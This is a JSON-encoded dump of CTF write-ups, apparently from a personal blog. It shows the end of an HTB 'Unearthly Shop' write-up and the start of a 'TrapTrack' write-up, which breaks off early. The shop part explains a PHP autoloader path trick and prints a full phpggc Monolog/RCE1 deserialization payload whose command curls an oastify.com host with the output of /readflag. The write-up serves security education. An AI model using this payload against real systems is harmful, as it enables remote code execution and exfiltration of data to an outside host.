($",{"type":33,"tag":128,"props":42399,"children":42400},{"style":306},[42401],{"type":38,"value":12126},{"type":33,"tag":128,"props":42403,"children":42404},{"style":312},[42405],{"type":38,"value":2966},{"type":33,"tag":128,"props":42407,"children":42408},{"style":312},[42409],{"type":38,"value":762},{"type":33,"tag":128,"props":42411,"children":42412},{"class":130,"line":362},[42413,42417,42421,42426,42430,42435,42440,42444,42449,42453,42457,42461,42465],{"type":33,"tag":128,"props":42414,"children":42415},{"style":1576},[42416],{"type":38,"value":6625},{"type":33,"tag":128,"props":42418,"children":42419},{"style":312},[42420],{"type":38,"value":2852},{"type":33,"tag":128,"props":42422,"children":42423},{"style":437},[42424],{"type":38,"value":42425},"preg_match",{"type":33,"tag":128,"props":42427,"children":42428},{"style":312},[42429],{"type":38,"value":5566},{"type":33,"tag":128,"props":42431,"children":42432},{"style":676},[42433],{"type":38,"value":42434},"'/",{"type":33,"tag":128,"props":42436,"children":42437},{"style":16561},[42438],{"type":38,"value":42439},"Controller",{"type":33,"tag":128,"props":42441,"children":42442},{"style":300},[42443],{"type":38,"value":3651},{"type":33,"tag":128,"props":42445,"children":42446},{"style":676},[42447],{"type":38,"value":42448},"/'",{"type":33,"tag":128,"props":42450,"children":42451},{"style":312},[42452],{"type":38,"value":5584},{"type":33,"tag":128,"props":42454,"children":42455},{"style":312},[42456],{"type":38,"value":40686},{"type":33,"tag":128,"props":42458,"children":42459},{"style":306},[42460],{"type":38,"value":12126},{"type":33,"tag":128,"props":42462,"children":42463},{"style":312},[42464],{"type":38,"value":7088},{"type":33,"tag":128,"props":42466,"children":42467},{"style":312},[42468],{"type":38,"value":762},{"type":33,"tag":128,"props":42470,"children":42471},{"class":130,"line":403},[42472,42477,42481,42485,42489,42494,42498,42502,42506,42510],{"type":33,"tag":128,"props":42473,"children":42474},{"style":312},[42475],{"type":38,"value":42476}," $",{"type":33,"tag":128,"props":42478,"children":42479},{"style":306},[42480],{"type":38,"value":12126},{"type":33,"tag":128,"props":42482,"children":42483},{"style":312},[42484],{"type":38,"value":5657},{"type":33,"tag":128,"props":42486,"children":42487},{"style":676},[42488],{"type":38,"value":679},{"type":33,"tag":128,"props":42490,"children":42491},{"style":140},[42492],{"type":38,"value":42493},"controllers/",{"type":33,"tag":128,"props":42495,"children":42496},{"style":312},[42497],{"type":38,"value":5720},{"type":33,"tag":128,"props":42499,"children":42500},{"style":140},[42501],{"type":38,"value":12126},{"type":33,"tag":128,"props":42503,"children":42504},{"style":312},[42505],{"type":38,"value":5730},{"type":33,"tag":128,"props":42507,"children":42508},{"style":676},[42509],{"type":38,"value":669},{"type":33,"tag":128,"props":42511,"children":42512},{"style":312},[42513],{"type":38,"value":5676},{"type":33,"tag":128,"props":42515,"children":42516},{"class":130,"line":739},[42517,42521,42526,42530,42534,42538,42542,42547,42551,42555,42559,42563,42567,42571],{"type":33,"tag":128,"props":42518,"children":42519},{"style":312},[42520],{"type":38,"value":14264},{"type":33,"tag":128,"props":42522,"children":42523},{"style":1576},[42524],{"type":38,"value":42525}," elseif",{"type":33,"tag":128,"props":42527,"children":42528},{"style":312},[42529],{"type":38,"value":2852},{"type":33,"tag":128,"props":42531,"children":42532},{"style":437},[42533],{"type":38,"value":42425},{"type":33,"tag":128,"props":42535,"children":42536},{"style":312},[42537],{"type":38,"value":5566},{"type":33,"tag":128,"props":42539,"children":42540},{"style":676},[42541],{"type":38,"value":42434},{"type":33,"tag":128,"props":42543,"children":42544},{"style":16561},[42545],{"type":38,"value":42546},"Model",{"type":33,"tag":128,"props":42548,"children":42549},{"style":300},[42550],{"type":38,"value":3651},{"type":33,"tag":128,"props":42552,"children":42553},{"style":676},[42554],{"type":38,"value":42448},{"type":33,"tag":128,"props":42556,"children":42557},{"style":312},[42558],{"type":38,"value":5584},{"type":33,"tag":128,"props":42560,"children":42561},{"style":312},[42562],{"type":38,"value":40686},{"type":33,"tag":128,"props":42564,"children":42565},{"style":306},[42566],{"type":38,"value":12126},{"type":33,"tag":128,"props":42568,"children":42569},{"style":312},[42570],{"type":38,"value":7088},{"type":33,"tag":128,"props":42572,"children":42573},{"style":312},[42574],{"type":38,"value":762},{"type":33,"tag":128,"props":42576,"children":42577},{"class":130,"line":765},[42578,42582,42586,42590,42594,42599,42603,42607,42611,42615],{"type":33,"tag":128,"props":42579,"children":42580},{"style":312},[42581],{"type":38,"value":42476},{"type":33,"tag":128,"props":42583,"children":42584},{"style":306},[42585],{"type":38,"value":12126},{"type":33,"tag":128,"props":42587,"children":42588},{"style":312},[42589],{"type":38,"value":5657},{"type":33,"tag":128,"props":42591,"children":42592},{"style":676},[42593],{"type":38,"value":679},{"type":33,"tag":128,"props":42595,"children":42596},{"style":140},[42597],{"type":38,"value":42598},"models/",{"type":33,"tag":128,"props":42600,"children":42601},{"style":312},[42602],{"type":38,"value":5720},{"type":33,"tag":128,"props":42604,"children":42605},{"style":140},[42606],{"type":38,"value":12126},{"type":33,"tag":128,"props":42608,"children":42609},{"style":312},[42610],{"type":38,"value":5730},{"type":33,"tag":128,"props":42612,"children":42613},{"style":676},[42614],{"type":38,"value":669},{"type":33,"tag":128,"props":42616,"children":42617},{"style":312},[42618],{"type":38,"value":5676},{"type":33,"tag":128,"props":42620,"children":42621},{"class":130,"line":804},[42622,42626,42630,42634,42638,42642,42646,42651,42655,42659,42663,42667,42671],{"type":33,"tag":128,"props":42623,"children":42624},{"style":312},[42625],{"type":38,"value":14264},{"type":33,"tag":128,"props":42627,"children":42628},{"style":1576},[42629],{"type":38,"value":42525},{"type":33,"tag":128,"props":42631,"children":42632},{"style":312},[42633],{"type":38,"value":2852},{"type":33,"tag":128,"props":42635,"children":42636},{"style":437},[42637],{"type":38,"value":42425},{"type":33,"tag":128,"props":42639,"children":42640},{"style":312},[42641],{"type":38,"value":5566},{"type":33,"tag":128,"props":42643,"children":42644},{"style":676},[42645],{"type":38,"value":42434},{"type":33,"tag":128,"props":42647,"children":42648},{"style":16561},[42649],{"type":38,"value":42650},"_",{"type":33,"tag":128,"props":42652,"children":42653},{"style":676},[42654],{"type":38,"value":42448},{"type":33,"tag":128,"props":42656,"children":42657},{"style":312},[42658],{"type":38,"value":5584},{"type":33,"tag":128,"props":42660,"children":42661},{"style":312},[42662],{"type":38,"value":40686},{"type":33,"tag":128,"props":42664,"children":42665},{"style":306},[42666],{"type":38,"value":12126},{"type":33,"tag":128,"props":42668,"children":42669},{"style":312},[42670],{"type":38,"value":7088},{"type":33,"tag":128,"props":42672,"children":42673},{"style":312},[42674],{"type":38,"value":762},{"type":33,"tag":128,"props":42676,"children":42677},{"class":130,"line":839},[42678,42682,42686,42690,42695,42699,42703,42707,42711,42715,42719,42723,42727,42731,42735,42739],{"type":33,"tag":128,"props":42679,"children":42680},{"style":312},[42681],{"type":38,"value":42476},{"type":33,"tag":128,"props":42683,"children":42684},{"style":306},[42685],{"type":38,"value":12126},{"type":33,"tag":128,"props":42687,"children":42688},{"style":312},[42689],{"type":38,"value":5657},{"type":33,"tag":128,"props":42691,"children":42692},{"style":437},[42693],{"type":38,"value":42694}," preg_replace",{"type":33,"tag":128,"props":42696,"children":42697},{"style":312},[42698],{"type":38,"value":5566},{"type":33,"tag":128,"props":42700,"children":42701},{"style":676},[42702],{"type":38,"value":42434},{"type":33,"tag":128,"props":42704,"children":42705},{"style":16561},[42706],{"type":38,"value":42650},{"type":33,"tag":128,"props":42708,"children":42709},{"style":676},[42710],{"type":38,"value":42448},{"type":33,"tag":128,"props":42712,"children":42713},{"style":312},[42714],{"type":38,"value":5584},{"type":33,"tag":128,"props":42716,"children":42717},{"style":676},[42718],{"type":38,"value":6739},{"type":33,"tag":128,"props":42720,"children":42721},{"style":140},[42722],{"type":38,"value":7367},{"type":33,"tag":128,"props":42724,"children":42725},{"style":676},[42726],{"type":38,"value":6040},{"type":33,"tag":128,"props":42728,"children":42729},{"style":312},[42730],{"type":38,"value":5584},{"type":33,"tag":128,"props":42732,"children":42733},{"style":312},[42734],{"type":38,"value":40686},{"type":33,"tag":128,"props":42736,"children":42737},{"style":306},[42738],{"type":38,"value":12126},{"type":33,"tag":128,"props":42740,"children":42741},{"style":312},[42742],{"type":38,"value":5815},{"type":33,"tag":128,"props":42744,"children":42745},{"class":130,"line":848},[42746],{"type":33,"tag":128,"props":42747,"children":42748},{"style":312},[42749],{"type":38,"value":6760},{"type":33,"tag":128,"props":42751,"children":42752},{"class":130,"line":976},[42753],{"type":33,"tag":128,"props":42754,"children":42755},{"emptyLinePlaceholder":896},[42756],{"type":38,"value":899},{"type":33,"tag":128,"props":42758,"children":42759},{"class":130,"line":988},[42760,42764,42769,42773,42777,42781,42785,42789,42793,42798,42802],{"type":33,"tag":128,"props":42761,"children":42762},{"style":312},[42763],{"type":38,"value":41832},{"type":33,"tag":128,"props":42765,"children":42766},{"style":306},[42767],{"type":38,"value":42768},"filename",{"type":33,"tag":128,"props":42770,"children":42771},{"style":312},[42772],{"type":38,"value":5657},{"type":33,"tag":128,"props":42774,"children":42775},{"style":676},[42776],{"type":38,"value":679},{"type":33,"tag":128,"props":42778,"children":42779},{"style":140},[42780],{"type":38,"value":7367},{"type":33,"tag":128,"props":42782,"children":42783},{"style":312},[42784],{"type":38,"value":5720},{"type":33,"tag":128,"props":42786,"children":42787},{"style":140},[42788],{"type":38,"value":12126},{"type":33,"tag":128,"props":42790,"children":42791},{"style":312},[42792],{"type":38,"value":5730},{"type":33,"tag":128,"props":42794,"children":42795},{"style":140},[42796],{"type":38,"value":42797},".php",{"type":33,"tag":128,"props":42799,"children":42800},{"style":676},[42801],{"type":38,"value":669},{"type":33,"tag":128,"props":42803,"children":42804},{"style":312},[42805],{"type":38,"value":5676},{"type":33,"tag":128,"props":42807,"children":42808},{"class":130,"line":1001},[42809],{"type":33,"tag":128,"props":42810,"children":42811},{"emptyLinePlaceholder":896},[42812],{"type":38,"value":899},{"type":33,"tag":128,"props":42814,"children":42815},{"class":130,"line":1014},[42816,42820,42824,42829,42833,42837,42841],{"type":33,"tag":128,"props":42817,"children":42818},{"style":1576},[42819],{"type":38,"value":6625},{"type":33,"tag":128,"props":42821,"children":42822},{"style":312},[42823],{"type":38,"value":2852},{"type":33,"tag":128,"props":42825,"children":42826},{"style":437},[42827],{"type":38,"value":42828},"file_exists",{"type":33,"tag":128,"props":42830,"children":42831},{"style":312},[42832],{"type":38,"value":40659},{"type":33,"tag":128,"props":42834,"children":42835},{"style":306},[42836],{"type":38,"value":42768},{"type":33,"tag":128,"props":42838,"children":42839},{"style":312},[42840],{"type":38,"value":7088},{"type":33,"tag":128,"props":42842,"children":42843},{"style":312},[42844],{"type":38,"value":762},{"type":33,"tag":128,"props":42846,"children":42847},{"class":130,"line":1026},[42848,42853,42857,42861],{"type":33,"tag":128,"props":42849,"children":42850},{"style":1576},[42851],{"type":38,"value":42852}," require",{"type":33,"tag":128,"props":42854,"children":42855},{"style":312},[42856],{"type":38,"value":40686},{"type":33,"tag":128,"props":42858,"children":42859},{"style":306},[42860],{"type":38,"value":42768},{"type":33,"tag":128,"props":42862,"children":42863},{"style":312},[42864],{"type":38,"value":5676},{"type":33,"tag":128,"props":42866,"children":42867},{"class":130,"line":1038},[42868],{"type":33,"tag":128,"props":42869,"children":42870},{"style":312},[42871],{"type":38,"value":6760},{"type":33,"tag":128,"props":42873,"children":42874},{"class":130,"line":1051},[42875,42880,42884,42888,42892,42897,42902,42906,42910,42914],{"type":33,"tag":128,"props":42876,"children":42877},{"style":1576},[42878],{"type":38,"value":42879}," elseif",{"type":33,"tag":128,"props":42881,"children":42882},{"style":312},[42883],{"type":38,"value":2852},{"type":33,"tag":128,"props":42885,"children":42886},{"style":437},[42887],{"type":38,"value":42828},{"type":33,"tag":128,"props":42889,"children":42890},{"style":312},[42891],{"type":38,"value":5566},{"type":33,"tag":128,"props":42893,"children":42894},{"style":1576},[42895],{"type":38,"value":42896},"__DIR__",{"type":33,"tag":128,"props":42898,"children":42899},{"style":300},[42900],{"type":38,"value":42901}," .",{"type":33,"tag":128,"props":42903,"children":42904},{"style":312},[42905],{"type":38,"value":40686},{"type":33,"tag":128,"props":42907,"children":42908},{"style":306},[42909],{"type":38,"value":42768},{"type":33,"tag":128,"props":42911,"children":42912},{"style":312},[42913],{"type":38,"value":7088},{"type":33,"tag":128,"props":42915,"children":42916},{"style":312},[42917],{"type":38,"value":762},{"type":33,"tag":128,"props":42919,"children":42920},{"class":130,"line":1063},[42921,42925,42930,42934,42938,42942],{"type":33,"tag":128,"props":42922,"children":42923},{"style":1576},[42924],{"type":38,"value":42852},{"type":33,"tag":128,"props":42926,"children":42927},{"style":1576},[42928],{"type":38,"value":42929}," __DIR__",{"type":33,"tag":128,"props":42931,"children":42932},{"style":300},[42933],{"type":38,"value":42901},{"type":33,"tag":128,"props":42935,"children":42936},{"style":312},[42937],{"type":38,"value":40686},{"type":33,"tag":128,"props":42939,"children":42940},{"style":306},[42941],{"type":38,"value":42768},{"type":33,"tag":128,"props":42943,"children":42944},{"style":312},[42945],{"type":38,"value":5676},{"type":33,"tag":128,"props":42947,"children":42948},{"class":130,"line":1076},[42949],{"type":33,"tag":128,"props":42950,"children":42951},{"style":312},[42952],{"type":38,"value":6760},{"type":33,"tag":128,"props":42954,"children":42955},{"class":130,"line":1089},[42956],{"type":33,"tag":128,"props":42957,"children":42958},{"style":312},[42959],{"type":38,"value":5902},{"type":33,"tag":47,"props":42961,"children":42962},{},[42963],{"type":38,"value":42964},"Our goal here will be to pollute this function in order to allow loading the file /www/frontend/vendor/autoload.php. Because /www/frontend/vendor/autoload.php will load all the classes from the frontend vendor folder.",{"type":33,"tag":47,"props":42966,"children":42967},{},[42968],{"type":38,"value":42969},"For this, we need to create a serialized string that meets the expectations of the function. If our serialized string loads a class, it will go through this function.",{"type":33,"tag":47,"props":42971,"children":42972},{},[42973],{"type":38,"value":42974},"We can see that this function performs preg_replace, when adding the character '_' and replaces it with a '/'.",{"type":33,"tag":114,"props":42976,"children":42977},{"land":40629},[42978],{"type":33,"tag":119,"props":42979,"children":42981},{"code":42980,"language":40629,"meta":8,"className":40634,"style":8},"elseif (preg_match('/_/', $name)) {\n $name = preg_replace('/_/', '/', $name);\n}\n",[42982],{"type":33,"tag":105,"props":42983,"children":42984},{"__ignoreMap":8},[42985,43037,43105],{"type":33,"tag":128,"props":42986,"children":42987},{"class":130,"line":131},[42988,42993,42997,43001,43005,43009,43013,43017,43021,43025,43029,43033],{"type":33,"tag":128,"props":42989,"children":42990},{"style":1576},[42991],{"type":38,"value":42992},"elseif",{"type":33,"tag":128,"props":42994,"children":42995},{"style":312},[42996],{"type":38,"value":2852},{"type":33,"tag":128,"props":42998,"children":42999},{"style":437},[43000],{"type":38,"value":42425},{"type":33,"tag":128,"props":43002,"children":43003},{"style":312},[43004],{"type":38,"value":5566},{"type":33,"tag":128,"props":43006,"children":43007},{"style":676},[43008],{"type":38,"value":42434},{"type":33,"tag":128,"props":43010,"children":43011},{"style":16561},[43012],{"type":38,"value":42650},{"type":33,"tag":128,"props":43014,"children":43015},{"style":676},[43016],{"type":38,"value":42448},{"type":33,"tag":128,"props":43018,"children":43019},{"style":312},[43020],{"type":38,"value":5584},{"type":33,"tag":128,"props":43022,"children":43023},{"style":312},[43024],{"type":38,"value":40686},{"type":33,"tag":128,"props":43026,"children":43027},{"style":306},[43028],{"type":38,"value":12126},{"type":33,"tag":128,"props":43030,"children":43031},{"style":312},[43032],{"type":38,"value":7088},{"type":33,"tag":128,"props":43034,"children":43035},{"style":312},[43036],{"type":38,"value":762},{"type":33,"tag":128,"props":43038,"children":43039},{"class":130,"line":362},[43040,43045,43049,43053,43057,43061,43065,43069,43073,43077,43081,43085,43089,43093,43097,43101],{"type":33,"tag":128,"props":43041,"children":43042},{"style":312},[43043],{"type":38,"value":43044}," $",{"type":33,"tag":128,"props":43046,"children":43047},{"style":306},[43048],{"type":38,"value":12126},{"type":33,"tag":128,"props":43050,"children":43051},{"style":312},[43052],{"type":38,"value":5657},{"type":33,"tag":128,"props":43054,"children":43055},{"style":437},[43056],{"type":38,"value":42694},{"type":33,"tag":128,"props":43058,"children":43059},{"style":312},[43060],{"type":38,"value":5566},{"type":33,"tag":128,"props":43062,"children":43063},{"style":676},[43064],{"type":38,"value":42434},{"type":33,"tag":128,"props":43066,"children":43067},{"style":16561},[43068],{"type":38,"value":42650},{"type":33,"tag":128,"props":43070,"children":43071},{"style":676},[43072],{"type":38,"value":42448},{"type":33,"tag":128,"props":43074,"children":43075},{"style":312},[43076],{"type":38,"value":5584},{"type":33,"tag":128,"props":43078,"children":43079},{"style":676},[43080],{"type":38,"value":6739},{"type":33,"tag":128,"props":43082,"children":43083},{"style":140},[43084],{"type":38,"value":7367},{"type":33,"tag":128,"props":43086,"children":43087},{"style":676},[43088],{"type":38,"value":6040},{"type":33,"tag":128,"props":43090,"children":43091},{"style":312},[43092],{"type":38,"value":5584},{"type":33,"tag":128,"props":43094,"children":43095},{"style":312},[43096],{"type":38,"value":40686},{"type":33,"tag":128,"props":43098,"children":43099},{"style":306},[43100],{"type":38,"value":12126},{"type":33,"tag":128,"props":43102,"children":43103},{"style":312},[43104],{"type":38,"value":5815},{"type":33,"tag":128,"props":43106,"children":43107},{"class":130,"line":403},[43108],{"type":33,"tag":128,"props":43109,"children":43110},{"style":312},[43111],{"type":38,"value":854},{"type":33,"tag":47,"props":43113,"children":43114},{},[43115],{"type":38,"value":43116},"And then this function adds a / at the beginning of the file name.",{"type":33,"tag":114,"props":43118,"children":43119},{"land":40629},[43120],{"type":33,"tag":119,"props":43121,"children":43123},{"code":43122,"language":40629,"meta":8,"className":40634,"style":8},"$filename = \"/${name}.php\";\n",[43124],{"type":33,"tag":105,"props":43125,"children":43126},{"__ignoreMap":8},[43127],{"type":33,"tag":128,"props":43128,"children":43129},{"class":130,"line":131},[43130,43134,43138,43142,43146,43150,43154,43158,43162,43166,43170],{"type":33,"tag":128,"props":43131,"children":43132},{"style":312},[43133],{"type":38,"value":3651},{"type":33,"tag":128,"props":43135,"children":43136},{"style":306},[43137],{"type":38,"value":42768},{"type":33,"tag":128,"props":43139,"children":43140},{"style":312},[43141],{"type":38,"value":5657},{"type":33,"tag":128,"props":43143,"children":43144},{"style":676},[43145],{"type":38,"value":679},{"type":33,"tag":128,"props":43147,"children":43148},{"style":140},[43149],{"type":38,"value":7367},{"type":33,"tag":128,"props":43151,"children":43152},{"style":312},[43153],{"type":38,"value":5720},{"type":33,"tag":128,"props":43155,"children":43156},{"style":140},[43157],{"type":38,"value":12126},{"type":33,"tag":128,"props":43159,"children":43160},{"style":312},[43161],{"type":38,"value":5730},{"type":33,"tag":128,"props":43163,"children":43164},{"style":140},[43165],{"type":38,"value":42797},{"type":33,"tag":128,"props":43167,"children":43168},{"style":676},[43169],{"type":38,"value":669},{"type":33,"tag":128,"props":43171,"children":43172},{"style":312},[43173],{"type":38,"value":5676},{"type":33,"tag":47,"props":43175,"children":43176},{},[43177],{"type":38,"value":43178},"So if we pass this string:",{"type":33,"tag":114,"props":43180,"children":43181},{},[43182],{"type":33,"tag":119,"props":43183,"children":43185},{"code":43184},"www_frontend_vendor_autoload\n",[43186],{"type":33,"tag":105,"props":43187,"children":43188},{"__ignoreMap":8},[43189],{"type":38,"value":43184},{"type":33,"tag":47,"props":43191,"children":43192},{},[43193],{"type":38,"value":43194},"The function will change our string to this:",{"type":33,"tag":114,"props":43196,"children":43197},{},[43198],{"type":33,"tag":119,"props":43199,"children":43201},{"code":43200},"/www/frontend/vendor/autoload\n",[43202],{"type":33,"tag":105,"props":43203,"children":43204},{"__ignoreMap":8},[43205],{"type":38,"value":43200},{"type":33,"tag":47,"props":43207,"children":43208},{},[43209],{"type":38,"value":43210},"We add a var_dump before the require, and after the unserialize, for debugging purposes.",{"type":33,"tag":47,"props":43212,"children":43213},{},[43214],{"type":38,"value":43215},"We sumbit this serialized string:",{"type":33,"tag":114,"props":43217,"children":43218},{},[43219],{"type":33,"tag":119,"props":43220,"children":43222},{"code":43221},"O:28:\"www_frontend_vendor_autoload\":0:{}\n",[43223],{"type":33,"tag":105,"props":43224,"children":43225},{"__ignoreMap":8},[43226],{"type":38,"value":43221},{"type":33,"tag":47,"props":43228,"children":43229},{},[43230,43232],{"type":38,"value":43231},"We can see this output when we submit the login form:\n",{"type":33,"tag":32400,"props":43233,"children":43235},{"width":40587,"src":43234},"https://user-images.githubusercontent.com/28403617/227588741-a9c20422-e49d-41f1-ae03-485ef75179af.png",[],{"type":33,"tag":47,"props":43237,"children":43238},{},[43239],{"type":33,"tag":2302,"props":43240,"children":43241},{},[43242],{"type":38,"value":43243},"What is the __PHP_Incomplete_Class object ?",{"type":33,"tag":47,"props":43245,"children":43246},{},[43247],{"type":38,"value":43248},"The unserialize tries to load the class with name \"www_frontend_vendor_autoload\", but it doesn't exist. So he go to the spl_autoload_register function.\nAnd replace all '_' by '/' and adds a / at the beginning of the string.\nThen it include the file /www/frontend/vendor/autoload.php. But the class with the name www_frontend_vendor_autoload still not exists.",{"type":33,"tag":47,"props":43250,"children":43251},{},[43252],{"type":38,"value":43253},"So it's because we have __PHP_Incomplete_Class object when we try to print the deserialized class. This __PHP_Incomplete_Class do not stop the execution of the script, so we can add many more element in the serialized string it will be executed.",{"type":33,"tag":40,"props":43255,"children":43257},{"id":43256},"php-gadgets-part-2",[43258],{"type":38,"value":43259},"PHP Gadgets part 2",{"type":33,"tag":47,"props":43261,"children":43262},{},[43263],{"type":38,"value":43264},"Now we are certain that the autoload file from frontend is loaded, we know that the frontend vendor directory is now accessible via the backend folder. Now we have all the elements to craft our final payload with phpggc that will execute commands during deserialization.",{"type":33,"tag":47,"props":43266,"children":43267},{},[43268],{"type":38,"value":43269},"We need to have an array containing two elements:",{"type":33,"tag":47,"props":43271,"children":43272},{},[43273],{"type":38,"value":43274},"The first of which will include the autoload.php script.",{"type":33,"tag":114,"props":43276,"children":43277},{},[43278],{"type":33,"tag":119,"props":43279,"children":43280},{"code":43221},[43281],{"type":33,"tag":105,"props":43282,"children":43283},{"__ignoreMap":8},[43284],{"type":38,"value":43221},{"type":33,"tag":47,"props":43286,"children":43287},{},[43288,43290,43295],{"type":38,"value":43289},"The second it's our phpggc payload. From ",{"type":33,"tag":2302,"props":43291,"children":43292},{},[43293],{"type":38,"value":43294},"Monolog/RCE1",{"type":38,"value":43296}," gadget.",{"type":33,"tag":114,"props":43298,"children":43299},{},[43300],{"type":33,"tag":119,"props":43301,"children":43303},{"code":43302},"O:32:\"MonologHandlerSyslogUdpHandler\":1:{s:6:\"socket\";O:29:\"MonologHandlerBufferHandler\":7:{s:7:\"handler\";r:4;s:10:\"bufferSize\";i:-1;s:6:\"buffer\";a:1:{i:0;a:2:{i:0;s:62:\"curl e8nxzx9mnynbf74h1hcofv6i0964uvik.oastify.com/$(/readflag)\";s:5:\"level\";N;}}s:5:\"level\";N;s:11:\"initialized\";b:1;s:11:\"bufferLimit\";i:-1;s:10:\"processors\";a:2:{i:0;s:7:\"current\";i:1;s:6:\"system\";}}}\n",[43304],{"type":33,"tag":105,"props":43305,"children":43306},{"__ignoreMap":8},[43307],{"type":38,"value":43302},{"type":33,"tag":47,"props":43309,"children":43310},{},[43311],{"type":38,"value":43312},"When we assemble these two elements, we get this payload:",{"type":33,"tag":114,"props":43314,"children":43315},{},[43316],{"type":33,"tag":119,"props":43317,"children":43319},{"code":43318},"a:2:{i:0;O:28:\\\"www_frontend_vendor_autoload\\\":0:{}i:1;O:32:\\\"Monolog\\\\Handler\\\\SyslogUdpHandler\\\":1:{s:6:\\\"socket\\\";O:29:\\\"Monolog\\\\Handler\\\\BufferHandler\\\":7:{s:7:\\\"handler\\\";r:4;s:10:\\\"bufferSize\\\";i:-1;s:6:\\\"buffer\\\";a:1:{i:0;a:2:{i:0;s:62:\\\"curl e8nxzx9mnynbf74h1hcofv6i0964uvik.oastify.com/$(/readflag)\\\";s:5:\\\"level\\\";N;}}s:5:\\\"level\\\";N;s:11:\\\"initialized\\\";b:1;s:11:\\\"bufferLimit\\\";i:-1;s:10:\\\"processors\\\";a:2:{i:0;s:7:\\\"current\\\";i:1;s:6:\\\"system\\\";}}}}\n",[43320],{"type":33,"tag":105,"props":43321,"children":43322},{"__ignoreMap":8},[43323],{"type":38,"value":43318},{"type":33,"tag":47,"props":43325,"children":43326},{},[43327],{"type":38,"value":43328},"We submit this payload to modify the access field of the user admin, and we perform the login to execute our payload from deserialization. And voila, we have the flag.",{"type":33,"tag":75,"props":43330,"children":43332},{"imgSrc":43331},"https://user-images.githubusercontent.com/28403617/227621371-87fe5a93-c01c-4b9a-b7ec-dbb152d5a8c5.png",[],{"type":33,"tag":5227,"props":43334,"children":43335},{},[43336],{"type":38,"value":5231},{"title":8,"searchDepth":362,"depth":131,"links":43338},[43339,43340,43341,43342,43343,43344,43345],{"id":42,"depth":362,"text":45},{"id":22881,"depth":362,"text":22884},{"id":40592,"depth":362,"text":40595},{"id":41327,"depth":362,"text":41330},{"id":42282,"depth":362,"text":42285},{"id":42313,"depth":362,"text":42316},{"id":43256,"depth":362,"text":43259},"content:writeups:unearthly-shop.md","writeups/unearthly-shop.md","writeups/unearthly-shop",{"_path":43350,"_dir":6,"_draft":7,"_partial":7,"_locale":8,"title":43351,"description":8,"head":43352,"body":43369,"_type":5240,"_id":45385,"_source":5242,"_file":45386,"_stem":45387,"_extension":5245},"/writeups/traptrack","TrapTrack",{"title":43351,"description":43353,"keywords":43354,"slug":43355,"image":40198,"date":43356,"meta":43357},"TrapTrack challenge, was a hard web challenge from HTB cyber apocalypse. It was about SSRF, python unpickle and redis.","web,redis,unpickle,ssrf","traptrack","2023-03-19",[43358,43359,43360,43361,43362,43364,43365,43367],{"og:image":40198},{"og:title":43351},{"og:description":43353},{"og:type":21},{"og:url":43363},"https://owalid.com/traptrack",{"description":43353},{"title":43366},"TrapTrack writeup",{"keywords":43368},"web,redis,unpickle,ssrf,htb,ctf",{"type":30,"children":43370,"toc":45378},[43371,43375,43379,43384,43389,43405,43409,43413,43418,43436,43448,43452,43456,43461,43497,43503,43508,43929,43943,43954,43958,43969,43974,43980,43988,43998,44003,44014,44019,44024,44035,44040,44051,44056,44067,44072,44077,44088,44093,44107,44111,44116,44121,44442,44447,44458,44463,44682,44687,44698,44731,44736,44747,44752,44763,44768,44774,44795,44979,44991,44996,45001,45006,45011,45319,45330,45335,45346,45357,45370,45374],{"type":33,"tag":34,"props":43372,"children":43373},{"id":43355},[43374],{"type":38,"value":43351},{"type":33,"tag":40,"props":43376,"children":43377},{"id":42},[43378],{"type":38,"value":45},{"type":33,"tag":47,"props":43380,"children":43381},{},[43382],{"type":38,"value":43383},"TrapTrack was a web hard challenge from HTB cyber apocalypse 2023.",{"type":33,"tag":47,"props":43385,"children":43386},{},[43387],{"type":38,"value":43388},"This challenge is in white box, meaning we have access to the source code of the website.",{"type":33,"tag":47,"props":43390,"children":43391},{},[43392,43393,43398,43399,43404],{"type":38,"value":40237},{"type":33,"tag":105,"props":43394,"children":43396},{"className":43395},[],[43397],{"type":38,"value":40243},{"type":38,"value":40245},{"type":33,"tag":105,"props":43400,"children":43402},{"className":43401},[],[43403],{"type":38,"value":5294},{"type":38,"value":40252},{"type":33,"tag":47,"props":43406,"children":43407},{},[43408],{"type":38,"value":40257},{"type":33,"tag":40,"props":43410,"children":43411},{"id":22881},[43412],{"type":38,"value":22884},{"type":33,"tag":47,"props":43414,"children":43415},{},[43416],{"type":38,"value":43417},"The application has three services: a Flask web service, a SQLite database, and a Redis cache service.",{"type":33,"tag":239,"props":43419,"children":43420},{},[43421,43426,43431],{"type":33,"tag":243,"props":43422,"children":43423},{},[43424],{"type":38,"value":43425},"The web service has a login page and a page for entering a URL to check if it responds properly.",{"type":33,"tag":243,"props":43427,"children":43428},{},[43429],{"type":38,"value":43430},"SQLite is used to store information about URLs and users.",{"type":33,"tag":243,"props":43432,"children":43433},{},[43434],{"type":38,"value":43435},"Redis is used to cache the list of \"jobs\" corresponding to a request that needs to be performed in the future or not, as well as to store its status.",{"type":33,"tag":47,"props":43437,"children":43438},{},[43439,43441,43447],{"type":38,"value":43440},"We have the user admin's credentials, which are: ",{"type":33,"tag":105,"props":43442,"children":43444},{"className":43443},[],[43445],{"type":38,"value":43446},"admin:admin",{"type":38,"value":215},{"type":33,"tag":32400,"props":43449,"children":43451},{"width":40587,"src":43450},"https://user-images.githubusercontent.com/28403617/227371182-a29df4a9-c5c5-4405-a7d9-af679789ff2a.png",[],{"type":33,"tag":32400,"props":43453,"children":43455},{"width":40587,"src":43454},"https://user-images.githubusercontent.com/28403617/227371190-7f325e53-60cf-41ed-aed1-35906d13cdad.png",[],{"type":33,"tag":47,"props":43457,"children":43458},{},[43459],{"type":38,"value":43460},"On the server, we have two interesting routes:",{"type":33,"tag":239,"props":43462,"children":43463},{},[43464,43481],{"type":33,"tag":243,"props":43465,"children":43466},{},[43467,43471,43473,43479],{"type":33,"tag":128,"props":43468,"children":43469},{},[43470],{"type":38,"value":1406},{"type":38,"value":43472}," ",{"type":33,"tag":105,"props":43474,"children":43476},{"className":43475},[],[43477],{"type":38,"value":43478},"/track/add",{"type":38,"value":43480}," which allows adding a new URL to call.",{"type":33,"tag":243,"props":43482,"children":43483},{},[43484,43488,43489,43495],{"type":33,"tag":128,"props":43485,"children":43486},{},[43487],{"type":38,"value":29696},{"type":38,"value":43472},{"type":33,"tag":105,"props":43490,"children":43492},{"className":43491},[],[43493],{"type":38,"value":43494},"/tracks/\u003Cint:job_id>/status",{"type":38,"value":43496}," which allows verifying the state of the URL that was called.",{"type":33,"tag":40,"props":43498,"children":43500},{"id":43499},"ssrf",[43501],{"type":38,"value":43502},"SSRF 